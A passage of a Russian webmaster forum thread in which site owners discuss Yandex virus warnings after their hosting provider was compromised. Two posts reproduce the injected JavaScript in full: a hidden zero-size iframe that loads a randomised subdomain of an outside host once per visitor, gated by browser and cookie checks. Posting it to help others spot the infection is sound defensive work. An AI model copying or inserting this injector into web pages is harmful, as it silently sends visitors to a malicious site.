Яндекс нашел вирус на сайте

R8
На сайте с 15.08.2013
Offline
0
#241

9 сентября опять появилось. только теперь код чуть модифицировали

var ifA0SRn = document.createElement('iframe');ifA0SRn.name = 'ifA0SRn';ifA0SRn.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'amstechn.ru/';ifA0SRn.style.width = '0px';ifA0SRn.style.height = '0px';bindEvent(function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifA0SRn=') == -1) && (navigator.userAgent.search(/Opera|Firefox|MSIE/) > -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifA0SRn);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'ifA0SRn=yes; path=/; expires=' + expiresDate; }, 5000);}});function bindEvent(funct){window[((window[($aEL='addEventListener')])?($aEL):('attachEvent'))](((window[$aEL])?(''):('on'))+'load',funct,((window[$aEL])?(!1):(null)));}function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}

видимо "антивирус" хостайфа пока пропускает новый код

[Удален]
#242

Если дыру не закрыли, то это будет бесконечно, достаточно хаккерам будет просто видоизменять код и прежний фильтр уже не будет действовать.

Вопрос в другом. Может данный вирус не косяк хостлайфа? Вроде пока массово другой код внедрялся.

Какое же счастье выбраться из бана. Наконец Яша посетил на новом хостинге и снял пометку 🍿.

А на хостлайфе Яша меня всегда опережал и из бана не удавалось выбраться...

77
На сайте с 27.08.2013
Offline
1
#243
Sergsap:
Пока спецы не подключились, выскажу свое предположение.
Как мне кажется нужно узнать этот лимит на выполнение скрипта у хостера и возможно такое же значение прописать в модуле.Ну или по крайней мере в саппорте модуля узнать, что делать дальше с этим значением.
Буквально на днях тоже приходилось узнавать это время таким скриптом
<?php

echo $_SERVER["DOCUMENT_ROOT"] . "\n<br />\n" . ini_get ( 'max_execution_time' );
?>


Заливаете скрипт на хостинг, запускаете из браузера и увидите во второй строке время выполнения php.

Упс. код изменяется.
Почитай тут

Увеличили ответ скрипта, не чего не выходит, модуль не работает. Что еще может быть в стороне хостера?

[Удален]
#244

777Sharpey777, сложно что либо советовать не имея никакой информации.

Есть уверенность, что файлы модуля не покоцаны? Вдруг хостер или еще кто что-то удалил?

Если саппорт модуля реагирует на запросы, можно отправить ему настроки вашего сервера, вдруг что не понравится.

Узнать настройки можно с помощью скрипта.

<?

phpinfo();
?>

Создать скрипт в блокноте с расширением .php, залить его на сервер и запустить.

testor
На сайте с 03.12.2010
Offline
23
#245
re8us:
9 сентября опять появилось. только теперь код чуть модифицировали
var ifA0SRn = document.createElement('iframe');ifA0SRn.name = 'ifA0SRn';ifA0SRn.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'amstechn.ru/';ifA0SRn.style.width = '0px';ifA0SRn.style.height = '0px';bindEvent(function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifA0SRn=') == -1) && (navigator.userAgent.search(/Opera|Firefox|MSIE/) > -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifA0SRn);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'ifA0SRn=yes; path=/; expires=' + expiresDate; }, 5000);}});function bindEvent(funct){window[((window[($aEL='addEventListener')])?($aEL):('attachEvent'))](((window[$aEL])?(''):('on'))+'load',funct,((window[$aEL])?(!1):(null)));}function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}


видимо "антивирус" хостайфа пока пропускает новый код

Обращайтесь в личку, готов помочь на безвозмездной основе :)

77
На сайте с 27.08.2013
Offline
1
#246

Мини официальный ответ в ВК

Иван Гарбера:
Уважаемые клиенты!
Пока что со всей ответственностью можем заявить, что на серверах хостинга больше нет ни единого зараженного JS-файла, и больше не появится - по крайней мере таким образом, как появлялись до этого.
Официальное объяснение ситуации будет позже.
SD
На сайте с 03.09.2013
Offline
10
#247

"по крайней мере таким образом, как появлялись до этого."

Замечательная оговорка)

hexacell
На сайте с 10.12.2010
Offline
65
#248

судя по тому, что тема заглохла, у всех всё в порядке с сайтами...

кто-нибудь писал в отдел продаж по поводу компенсации, о которой они говорят у себя на странице в vk?

[Удален]
#249

У меня хостер подсуетился, закрыл дырки.

MO
На сайте с 27.03.2013
Offline
25
#250

бьюсь уже которую неделю. Яндекс говорит о вирусе. Все на несколько раз перепроверили, все норм. Сайт на DLE egida-nsk. com Яндекс упорно гооврит о вирусе... хз что с ним делать? может какую ошибку проглядел все таки?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий